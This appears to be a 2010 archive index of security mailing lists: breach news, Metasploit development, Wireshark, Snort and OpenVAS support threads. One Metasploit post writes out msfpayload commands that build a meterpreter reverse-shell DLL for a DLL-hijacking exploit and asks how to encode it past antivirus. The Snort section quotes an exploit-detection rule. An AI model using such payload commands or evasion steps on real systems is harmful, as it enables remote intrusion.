This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.01.html>
The current issue can be...
Data Loss — Data Loss covers large-scale personal data loss and theft incidents. This archive combines the main list (news releases) and the discussion list.
Wow, pardon that last subject line..
security curmudgeon (Sep 01)
A bad cut and paste doesn't begin to explain the out of context IM snippet
that ended up as the subject. Apologies =)
Heartland settles with Discover over breach
security curmudgeon (Sep 01)
http://www.scmagazineus.com/heartland-settles-with-discover-over-breach/article/178116/
Heartland settles with Discover over breach
Dan Kaplan
September 01, 2010
Heartland Payment Systems, the New Jersey-based credit card processor that
fell victim to the largest reported data breach of all time, announced on
Wednesday that it will settle with Discover for $5 million. Heartland
already has settled with Visa for $60 million and MasterCard...
State retiree data breached
security curmudgeon (Sep 01)
---------- Forwarded message ----------
From: InfoSec News <alerts () infosecnews org>
http://www.delawareonline.com/article/20100831/NEWS02/8310324/State+retiree+data+breached
By J.L. MILLER
The News Journal
August 31, 2010
DOVER -- In a data breach that one security expert said could be worth
millions of dollars to scam artists, Aon Consulting, the state's benefits
consultant, inadvertently posted personal information of about 22,000...
Privacy commissioner orders shutdown of BCLC online gambling site until glitches can be fixed
security curmudgeon (Aug 31)
http://www.theprovince.com/technology/Privacy+commissioner+orders+shutdown+BCLC+online+gambling+site+until+glitches+fixed/3329791/story.html
Privacy commissioner orders shutdown of BCLC online gambling site until
glitches can be fixed
By Andy Ivens
The Province July 28, 2010
Provincial privacy commissioner Elizabeth Denham has ordered the
government's online gambling website to remain shut down until the B.C.
Lottery Corp. can find out what...
State employee retirees' Social Security numbers posted on website by vendor
kirniki (Aug 30)
http://www.newarkpostonline.com/articles/2010/08/30/news/doc4c7bc3beab609126028198.txt
State of Delaware consultant, Aon Consulting is mailing letters to
approximately 22,000 State of Delaware retirees, after the company
included Social Security Numbers, gender information and dates of
birth in a Request for Proposal (RFP) the company prepared for the
state.
[..]
Re: [Dataloss] E-mail Causes Most EnterpriseData Loss
Al (Aug 30)
There are many kinds of breaches. What we see via Dataloss is a sub-set of
the whole.
Dataloss seems more concerned with those that involve significant volume of
individual people's private data, not leakage of confidential corporate data
through social media. But the fact remains that many breaches occur because
some employee sends via e-mail an attachment listing info on many customers,
including bank account info. It is human error. It...
Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant
Al (Aug 30)
Thanks for corrections to my understandings.
It is evident that we are talking about multiple reports and data sets, from
which different conclusions may be drawn.
I have not looked at ALL the Verizon reports, but I think it was last year
they said that PCI was NOT the purpose of the report, it was to analyze how
the places got breached, which they had insider data on. The PCI
perspective there was kind of an after-thought, because of high...
Re: [Dataloss] E-mail Causes Most Enterprise Data Loss
Uzi Yair (Aug 30)
This report is a waste of valuable reading time, and an attempt by a
vendor to promote email security.
There are 65,535 ports and they are saying that email causes most data
loss. I have been monitoring this group for a long while. I do not
recall the last time there was an event from an email violation.
If indeed corporations were monitoring all 65,535 ports, then I would be
less skeptical.
Regards,
*Uzi Yair*| uyair <mailto:uyair ()...
Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant
Alex Hutton (Aug 30)
Discussion inline.
Hi Al
I'm somewhat familiar with them.
which come out at least annually,
I think you're confused as to the nature of the data set. Many/most
of our IR clients are not otherwise Verizon Cybertrust services
customers. In addition, this year's report includes 3 years of USSS
data. As such, there is very little information such a statistic
would offer, really.
Actually, we do. The data set now includes 3 years of USSS...
Re: [Dataloss] Study: About One-Fifth ofBreached Entities Were PCI-Compliant
Al (Aug 30)
If you read the actual Verizon reports, which come out at least annually,
Verizon is in the business of serving the needs of their customer clients.
We do not have a directory of their customers, other than inference from
someone whose e-mail address has the word "verizon" in there.
They do not reveal statistics like "We have X million customers of which X
thousand were knowingly breached."
They will not reveal any info that...
Re: [Dataloss] Study: About One-Fifth of Breached Entities Were PCI-Compliant
Alex Hutton (Aug 30)
FWIW neither of these are "surveys".
Sent from my iPad
E-mail Causes Most Enterprise Data Loss
security curmudgeon (Aug 30)
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=227101707&subSection=News
E-mail Causes Most Enterprise Data Loss
Breaches associated with social media, video sharing, blogs are also on
the rise, finds Proofpoint study.
By Alison Diana
InformationWeek
August 30, 2010 11:07 AM
Although e-mail continues to be the primary source of data-loss risk at
enterprises, the number of data-loss events...
follow-up: Alleged Carder 'BadB' Charged in $9 Million ATM Heist
security curmudgeon (Aug 30)
http://www.wired.com/threatlevel/2010/08/badb-rbs-worldpay-hack/
Alleged Carder 'BadB' Charged in $9 Million ATM Heist
By Kim Zetter
August 30, 2010
An alleged carder arrested earlier this month in France has been added to
a long list of defendants charged with participating in the coordinated
$9.5 million global heist against Atlanta-based card processing company
RBS WorldPay, in a revised federal indictment issued in Georgia last week....
Lost or stolen: dozens of NHS and council computers with personal data
Jake Kouns (Aug 29)
http://news.stv.tv/scotland/194476-lost-or-stolen-dozens-of-computers-with-personal-data/
Scores of computers, USB sticks and mobile phones were lost by
Scotland's public bodies in just a few months - including many
containing unencrypted personal information.
The figures, released on Sunday, reveal that one council - the West
Lothian authority - had 20 laptops stolen between February and July
this year.
A laptop stolen from one health board,...
Bad flash drive caused worst U.S. military breach
Jake Kouns (Aug 29)
http://news.cnet.com/8301-27080_3-20014732-245.htm
A malware-laden flash drive inserted in a laptop at a U.S. military
base in the Middle East in 2008 led to the "most significant breach
of" the nation's military computers ever, according to a new magazine
article by a top defense official.
The malware uploaded itself to the U.S. Central Command network and
spread undetected on classified and unclassified computers creating a...
Metasploit — Development discussion for Metasploit, the premier open source remote exploitation tool
Re: Dynamically Generated Final Stages
egypt (Sep 02)
If I understand you correctly, you can look at passivex for an example
of what you want. Basically you need to tell the framework that the
final stage is not transmitted over the stager connection as with
normal stagers. Then call generate_stage to get the final payload.
Hope this helped,
egypt
Re: Dynamically Generated Final Stages
tyronmiller (Sep 02)
Hey Philip,
Thanks for sending through the new link, as well as your response. I have
gone through the code and I don't think this was what I was after.
Appreciated anyway.
Let me see if I can be clearer in what I am after:
I have added my payload module called "awesome_payload" to my msf
installation. In msfconsole, when I type "search awesome_payload" I get the
following:
windows/dllinject/awesome_payload...
Re: middle stage listener and threads
Ty Miller (Sep 01)
Hey guys,
No one has any threads/shellcode experience?
Threads look like they would be cleaner on Windows; however, SK pointed me
to his phrack article talking about how to do Windows forking (
http://www.phrack.org/issues.html?id=7&issue=62). This refers to an article
by LSD which doesn't seem to be there anymore (
http://lsd-pl.net/windows_components.html) ... If anyone has this article,
then can you pass it on or point me in the right...
problem metasploit on iphone 3G
robert (Sep 01)
hello guys,
I have a problem with "show exploits" on my iPhone!
The other commands, show payloads and show nops, work fine; the only problem is with show exploits!
What's the problem?
msf > show exploits
[-] Error while running command show: uninitialized constant Msf::Encoder::Type::SingleStaticBit
Call stack:
/usr/share/msf3/data/msfweb/vendor/rails/activesupport/lib/active_support/dependencies.rb:431:in `load_missing_constant'...
nullcon Goa dwitiya (2.0) Call For Papers
nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference
nullcon is an initiative by null - The open security community.
Website:
http://nullcon.net
Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.
Tracks:
---------------
- Bakkar: 1 Hr Talks
-...
Re: Fwd: return values from railgun
Rob Fuller (Sep 01)
I forgot about the strict RFC compliance on this list and only replied to
you Josh, here is my reply since you referenced it:
// It really depends on the call you make and what the API call returns,
attempt your call, attaching it to a variable and see what it spits out.
Re: return values from railgun
Carlos Perez (Sep 01)
Here are the results of all message box types; just look for the "return" key of the returned hash and read the returned
value
creturn_val = client.railgun.user32.MessageBoxA(0,"Hello","world","MB_OKCANCEL")
=> {"GetLastError"=>0, "return"=>2}
=> 2
=> Fixnum
Values for all messagebox types:
# Abort
=> {"GetLastError"=>0, "return"=>3}
# Retry
=>...
Re: Fwd: return values from railgun
lazydj98 (Sep 01)
Sorry for the apparently blank message everyone
I had intended to say, if you're checking for success, I had asked a
similar question a few weeks ago, but not specific to railgun, and the
answer was, success if not exception thrown. However railgun might be
different since I'm guessing you're looking for the return codes from the
actual Windows functions that get called? Either way, try what Mubix said,
although you should be able to look...
Re: DLL name for webdav_dll_hijacker exploit
anil saini (Aug 31)
I have made a DLL using *"./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.1 LPORT=5050 D > /temp/rpawinet.dll"*. The DLL is working
and giving me a meterpreter shell.
But this DLL is caught by almost all anti-virus. I tried encoding it using
./msfencode, but then it stopped working.
I used "*./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1
LPORT=4433 R | ./msfencode -c 13 -e x86/shikata_ga_nai - t...
Re: Dynamically Generated Final Stages
Ty Miller (Aug 31)
thanks. I'll take a look and will let ya know.
Thx,
Ty
Fwd: return values from railgun
Joshua Smith (Aug 31)
return values from railgun
max (Aug 31)
Hi there list, I tried to use railgun in a meterpreter script. It works
fine so far for opening a MessageBoxA, but how do I get the return values
back from the API calls?
greetings
max
Re: Host Analysis
exibar (Aug 31)
Although not open source, Mandiant has a couple offerings that will do
what you want. They also have quite a few free tools that will also
perform these functions.
check them out, you'll be happy :-)
Exibar
Quoting Abhijeet Hatekar <abhi.hatekar () gmail com>:
Re: Host Analysis
Abhijeet Hatekar (Aug 31)
I would like to do a complete remote system analysis by scanning the registry,
services, processes, handles, network ports, shadow copies, open files, live
memory details, etc., and look for potential threats like viruses, malware and
rootkits.
GMER, IceSword and Autoruns can be used for most of these things, but I would
like to know if there is a single tool available for doing all of them.
Responder is one such tool; however, I am looking for...
Re: Shodan search in MSF?
John H. Sawyer (Aug 31)
I'm on my way there. Here's what I wrote last night. It's not a
module yet, but it's a start to interacting with the SHODAN API
using Ruby and JSON.
http://sploitlab.wordpress.com/
-jhs
Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.
buildbot failure in Wireshark (development) on OSX-10.5-PowerPC
buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of OSX-10.5-PowerPC on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/OSX-10.5-PowerPC/builds/955
Buildbot URL: http://buildbot.wireshark.org/trunk/
Buildslave for this Build: osx-10.5-ppc
Build Reason:
Build Source Stamp: 34043
Blamelist: etxrab
BUILD FAILED: failed failed slave lost
sincerely,
-The Buildbot
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
COHEN, HARVEY S (ATTLABS) (Sep 02)
At Anders' suggestion, I downloaded and installed
wireshark-win32-1.5.0-SVN-34038.exe from
http://www.wireshark.org/download/automated/win32/
T.38 and RTP now appear correctly in the ladder diagram.
Harvey S. Cohen
AT&T Labs, Middletown, NJ
Mobile +1-908-768-5833
Office +1-732-420-4099
-----Original Message-----
From: wireshark-users-bounces () wireshark org
[mailto:wireshark-users-bounces () wireshark org] On Behalf Of...
buildbot failure in Wireshark (development) on Ubuntu-10.04-x64
buildbot-no-reply (Sep 02)
The Buildbot has detected a new failure of Ubuntu-10.04-x64 on Wireshark (development).
Full details are available at:
http://buildbot.wireshark.org/trunk/builders/Ubuntu-10.04-x64/builds/470
Buildbot URL: http://buildbot.wireshark.org/trunk/
Buildslave for this Build: ubuntu-10.04-x64
Build Reason:
Build Source Stamp: 34041
Blamelist: etxrab
BUILD FAILED: failed run-randpkt
sincerely,
-The Buildbot
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Keith French (Sep 02)
I have just raised this on bugzilla as bug 5172
-----Original Message-----
From: wireshark-users-bounces () wireshark org on behalf of Keith French
Sent: Thu 02/09/2010 10:37
To: Community support list for Wireshark
Subject: RE: [Wireshark-users] VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in...
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Keith French (Sep 02)
I have a similar problem with 1.4.0 and the latest development release 1.5.0 SVN 34041. There are two identical H323
calls in my trace, the FLOW graphs work fine for both displaying the H225, H245 & RTP. However, on one call Prepare
Filter only shows the H225, but on the other call it shows H225, H245 & RTP.
I'll raise it on bugzilla & attach my trace.
Keith French.
-----Original Message-----
From: wireshark-users-bounces ()...
Re: library wireshark in ruby
Stephen Fisher (Sep 01)
This question comes up on a regular basis on this list, usually. There
is no documentation on using libwireshark's dissection API other than
the source code and developer's documentation. That library is not
designed with use outside Wireshark in mind, though it is possible as
long as GPL guidelines (under which it's licensed) are adhered to.
Re: Export to CSV
Bill Meier (Sep 01)
Jaap Keuter wrote:
I was mistaken: The problem does occur on Windows.
A similar (but not quite the same) issue exists for exporting psml files.
The "PSML structure" is written at the beginning of the file only for
the first file written. Any following psml exported files will not have
the structure.
(There's a "static gboolean structure_written = FALSE;" in
proto_tree_write_psml() ...).
I'll fix both of these...
Re: Export to CSV
Stig Bjørlykke (Sep 01)
I also found some issues exporting as PSML. The second time a PSML
file is saved it's missing the headers.
I'll fix both cases :)
Re: Export to CSV
Jaap Keuter (Sep 01)
Sent from my iPhone
Because... ? (don't have the code at hand right now)
Thanks,
Jaap
Re: Export to CSV
Bill Meier (Sep 01)
Stig Bjørlykke wrote:
The actual issue is that the header fields are output only if
the output includes the first packet (#1) of the capture (however the
packet range is selected and independent of filters, etc).
This bug occurs only on platforms other than Windows.
Re: VoIP calls GRAPH button gone. FLOW button shows SIP but not RTP or T.38
Anders Broman (Sep 01)
Hi,
Could you try it on a development build from http://www.wireshark.org/download/automated/
it might be related to http://anonsvn.wireshark.org/viewvc/viewvc.cgi?view=rev&revision=33525
Please let us know the result.
Regards
Anders
________________________________
From: wireshark-users-bounces () wireshark org [mailto:wireshark-users-bounces () wireshark org] On Behalf Of COHEN,
HARVEY S (ATTLABS)
Sent: den 31 augusti 2010 22:00
To:...
Re: Wireshark sniffer stop by itself
Bill Meier (Sep 01)
Bill Meier wrote:
Addendum:
Re:
>> ...., the sniffer didn't stop working
>> completely but only the capture stop.
Do you mean that the Wireshark GUI was still running and responding ?
If so: then I don't know what happened.
I would still try using Dumpcap by itself to see if the problem still
occurs.
How to decode FP over UDP?
wang . hongxia1 (Sep 01)
I am using Wireshark version 1.2.9. I have some FP packets in pcap
format. However I do not see FP protocol option in "decode as" list.
However, Enabled protocols shows FP protocols enabled, which indicates
Wireshark supports FP. I fill "fp" in filters, I cannot get any packets
filtered. However, I see some packets over UDP transported from RNC.
Please tell me how can I decode packets as FP.
Those sample fp packets...
Re: Wireshark sniffer stop by itself
Bill Meier (Sep 01)
גוטליב טובים אסף wrote:
Please see: http://wiki.wireshark.org/KnownBugs/OutOfMemory
Wireshark accumulates "state" during a capture and thus will eventually
run out of memory during an extended capture.
It would be better to use Dumpcap If you want to do an extended capture.
Dumpcap just captures the data and writes it to a file.
(Dumpcap is the program used by Wireshark to capture data).
Re: How to decode FP over UDP?
Bill Meier (Sep 01)
wang.hongxia1 () zte com cn wrote:
I know nothing about the FP protocol;
However, perhaps the info in the Wireshark Wiki may be of help
http://wiki.wireshark.org/FP
http://wiki.wireshark.org/FP%20Hint
Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.
Re: Performance Monitor Graphing Tool
JJ Cummings (Sep 02)
I'm building an updated one currently... See my blog post from yesterday here: http://global-security.blogspot.com
Comments/desires(for the tool) are all welcome. I'll likely be publishing some initial code shortly!
JJC
Sent from the iRoad
------------------------------------------------------------------------------
This SF.net Dev2Dev email is sponsored by:
Show off your parallel programming skills.
Enter the Intel(R) Threading Challenge...
Re: Performance Monitor Graphing Tool
Eoin Miller (Sep 02)
On 9/2/2010 6:46 PM, Greg Lane wrote:
I just end up using GNUPlot + cron. I wrote up a quick blog on it if you
want to see some examples:
http://trojanedbinaries.com/blog/?p=24
-- Eoin
Performance Monitor Graphing Tool
Greg Lane (Sep 02)
Does anybody have a good location to obtain a good perfmonitor graph tool for
snort? Every link that I have tried doesn't seem to work and nothing is
available.
Greg Lane
IT Manager
Lane Enterprises
Email: greglane () laneconstinc com
Phone: (228)872-2414
snort 2.8.6.1/base/ barnyard2 unified2 classification_id
Lawrence R. Hughes, Sr. (Sep 02)
Hi,
I have noticed that snort populates the 32 bit field for the classification id in its unified2 output, but barnyard2
never inserts the classification id into the database?
Below is a snapshot from our mysql.log of all transactions between barnyard2 and mysql:
554 Query BEGIN
554 Query SELECT sig_id FROM signature WHERE sig_name = 'POLICY RDP attempted administrator connection request ' AND
sig_rev = 4 AND sig_sid = 4060 AND sig_gid = 1...
Snort 2.9.0 and Intel QuickAssist
Document Retention (Sep 02)
Hello,
What types of hardware devices are the Snort Community using that takes
advantage of the Intel QuickAssist feature added to Snort 2.9.0?
Thanks,
Doc
Re: Does 'ttl' allow less-than-or-equal and greater-than-or-equal?
Russ Combs (Sep 02)
A bug is open on this and the fix (including support for <= and >=) should
be out soon.
The manual was already fixed following your earlier email. Sorry you didn't
get a response then.
There is no public bug tracker (other than this list). But as these bugs
work their way through the system, additional steps are taken to ensure
related things are updated, including SF manuals.
Thanks for pointing out these issues.
Russ...
Rule 3:13476 direction?
Jefferson, Shawn (Sep 01)
Hi,
I'm looking at a few alerts from the so_rule 3:13476, but it looks like the direction is wrong...
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"WEB-MISC Microsoft IIS HTMLEncode Unicode string buffer
overflow"; sid:13476; gid:3; rev:2; classtype:web-application-attack; reference:cve,2008-0075;
reference:url,www.microsoft.com/technet/security/bulletin/ms08-006.mspx; metadata: engine shared, soid 3|13476;)
(and...
preprocessor ftp_telnet_protocol: FP on spaces
Castle, Shane (Sep 01)
The preprocessor ftp_telnet_protocol always FPs when there is a space in
(e.g.) the CWD command (or any other, for that matter). How do I stop
these alerts? The README.ftptelnet is of no help here. Reading the guide
PDF indicates that I might be able to override this with
cmd_validity CWD < string > (in the case of the CWD FP)
but this is not clear. I suppose I could try it...
Re: how to create testing data files??
Russ Combs (Aug 31)
If you really want to go from text strings straight into Snort, abcip (
http://sourceforge.net/projects/abcip/ ) now includes a DAQ and a raw input
mode, so you can so stuff like this:
Terminal:
snort --daq abc --daq-var raw -i tty
Redirect:
snort --daq abc --daq-var raw -i tty < test.txt
Readback:
snort --daq abc --daq-var raw -r test.txt
Russ
Re: A few questions regarding Solaris
Mike Lococo (Aug 31)
I add a userparameter to the zabbix_agentd.conf file as follows (ignore
linebreaks, it should all be on one line):
UserParameter=snort.perfmon[*],tail -n1 '/var/log/snort
/$1/snort.stats' | awk -F ',' '{print $ $2}'
This uses tail to grab the last line of a stats file, and pipes that
line into awk in order to print a particular column. $1 and $2 are
zabbix variables that allow you to create "items" that monitor different...
Re: A few questions regarding Solaris
Robert Riskin (Aug 31)
Mike, thank you very much for the info. I'm curious how you have Zabbix watch
your perfmon file with certain columns. I use Zabbix in a separate
environment (and I love it) but am planning on deploying in production by
year-end.
Yeah, I'm going to rebuild the system with a supported SO_RULES platform.
I was thinking about going for a sourcefire box but I really enjoy building
and learning this stuff from the ground up, it's very informative and...
Re: A few questions regarding Solaris
Mike Lococo (Aug 31)
I don't have strong feelings about platform. I've always run on RedHat,
which works for me. Lots of folks I respect use FreeBSD. I think
pretty much any platform with pre-compiled SO_RULES is a first-class
citizen with respect to running Snort.
Read the fine manual, there's a section on the perfmon preprocessor. It
writes output to a file of your choosing in comma delimited format. I
use Zabbix to collect and graph the columns I'm...
Re: A few questions regarding Solaris
Robert Riskin (Aug 31)
@ Mike
Thanks for your information regarding the SO_RULES about the source
compiled, this means I will have to switch platforms completely. I'm
thinking about CENTOS or Ubuntu, however it looks like Snort is not
compatible with the latest Ubuntu release? (Talking about SO_RULES) and
since they are in the midst of changing supported platforms I will most
likely rebuild my HP system. Does that make the most sense? I'm not going to
do anything with...
Re: sigs
Joel Esler (Aug 31)
On Tue, Aug 31, 2010 at 11:22 AM, Yolimita Uribe
<yolimita.uribe () gmail com>wrote:
What type of distributed attacks?
Snort does not do correlation in between sigs at the present time, no.
sigs
Yolimita Uribe (Aug 31)
Hi, I have a question.
How does snort find distributed attacks? Does snort do correlation
between sigs? Or does snort have sigs for this type of attack?
thanks
OpenVAS — Development and announcements regarding OpenVAS, a free network security scanner which forked from Nessus. This is a combination of the English openvas-announce, openvas-devel, openvas-discuss, and openvas-plugins lists.
Re: Memory footprint for openvassd
Thomas Reinke (Sep 02)
Ok...have some additional information to add now -
it would seem that a raw start up of Nessus was consuming
approximately 20M. The same start-up on OpenVAS
consumes >100M. It also seems that the child processes
are constrained by the maximum size of that startup,
i.e. we never see the memory of an actual script
processing task exceed that memory usage.
The factor of 5 (approximately 4K memory consumption
per script in the test suite)...
Memory footprint for openvassd
Thomas Reinke (Sep 02)
Hi all,
We're using openvas scanning daemon 3.1 only (have our own
customized client for controlling scans), and we've noticed
that with the change from nessus to openvas, the memory footprint
has ballooned in a huge way.
Currently, the typical amount of memory being consumed by
processes is averaging around 40 Meg per process, but many
tasks running over 100Meg.
We've already throttled our scan utilization to one third
of what it used to be,...
Re: Manager can't update/rebuild DB: database table is locked
Matthew Mundell (Aug 27)
Perhaps there is an old Manager running that has the lock on the database?
Manager can't update/rebuild DB: database table is locked
LC W (Aug 27)
Hello all. I've built and installed openvas-libraries-3.1.2,
openvas-scanner-3.1.0, and openvas-manager-1.0.2 from source on
RHEL5.5. I created the "om" account/certs per the README, and started
openvassd on port 9391, then tried to do a rebuild of the manager
database by running "openvasmd --sport 9391 --rebuild --verbose". If
I watch the manager log, I see that it connects to the scanner, and
then a bunch of SQL...
Re: Can't use SMB credentials
Jean Mouric (Aug 27)
I'm not sure about that. I found out that my plugin folder had been
corrupted and smb authentication worked just fine when I restored it. As
for the password not showing in the logs, it may be intentional, since it
doesn't show when you do a get_config either.
2010/8/27 Lucyga Dierk <Dierk.Lucyga () cancom de>
Re: Can't use SMB credentials
Lucyga Dierk (Aug 27)
Hi,
This might be related to the (yet unsolved) problem I described in my mail on August 13.
Seems like SMB passwords are generally ignored.
Dierk Lucyga
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
Well, my bad, I got it to work after all. It seems that my plugin folder was
corrupted: everything seems to be ok now. Thanks for the answers!
2010/8/26 Jean Mouric <j.mouric () gmail com>
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
I'll consider it.
How could I miss this? I changed it, but it still doesn't work though.
As I said, the lsc_credential method doesn't work either for SMB, which is
also why I think the type error above isn't the source of the problem. Is
there any difference in the handling of SMB parameters by the manager
compared to SSH? Maybe I shouldn't specify this in clear text but a specific
format?
Re: Can't use SMB credentials
Matthew Mundell (Aug 26)
Doing a | xmlstarlet will probably be easier.
You could leave out the <name>, because the Manager will use the name in
the get_configs_response.
[...]
This should be of type password.
Note also that if the target has a credential associated with it, then the
Manager will also send those credentials. This could override the values
you sent here.
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
Oh, I just realized trimmed the slashes in my commands in my e-mail, they
actually look like:
omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"
omp -p 9391 -X "<create_config><name>[my config name]</name><get_configs_
2010/8/26 Jean Mouric <j.mouric () gmail com>
Re: Can't use SMB credentials
Jean Mouric (Aug 26)
Oops, I meant omp as in openvas-cli, sorry about that, I did use the right
thing.
As for the exact OMP commands I use, I start the scanner and the manager as
usual and then:
(note: I do a | sed to get the ids generated by each command)
omp -p 9391 -X "<create_target><name>my target</name><hosts>[my targets
here]</hosts></create_target>"
omp -p 9391 -X "<create_config><name>[my...
Re: Can't use SMB credentials
Jan-Oliver Wagner (Aug 25)
just a side note: please as your time permits use the "omp" command line tool of the
package "openvas-cli". That represents the most current state.
"omp-cli" has been moved out of the newest OpenVAS-Client.
Best
Jan
Re: Can't use SMB credentials
Matthew Mundell (Aug 25)
It'd probably help if you listed an example of the exact OMP commands you
are using so we can look for the problem.
Also, if you run gsad with -v it will write a log including all the OMP to
PREFIX/var/log/openvas/gsad.log. This could help you figure out what the
GSA is doing right.
Can't use SMB credentials
Jean Mouric (Aug 25)
Hi everyone!
I'm having somewhat of a weird problem. Here goes: I'm trying to automate
OpenVAS by having scripts run omp-cli. For the config, I have a template
file that I modify and feed to omp-cli.
I tried putting ssh and smb credentials (all in clear text) in it and ssh
works but smb doesn't. I tried to use <create_lsc_credential> to integrate
in the target instead of changing the config, and the same thing happened:
ssh worked and...
Re: Cannot attach to remote openvassd instances, but local scans possible
Brandon Perry (Aug 25)
I was actually misunderstanding what '-a' did and now have it working.
I apologize for the noise.
We also maintain archives for these lists (some are currently inactive):
Read some old-school private security digests such as Zardoz at SecurityDigest.Org
We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.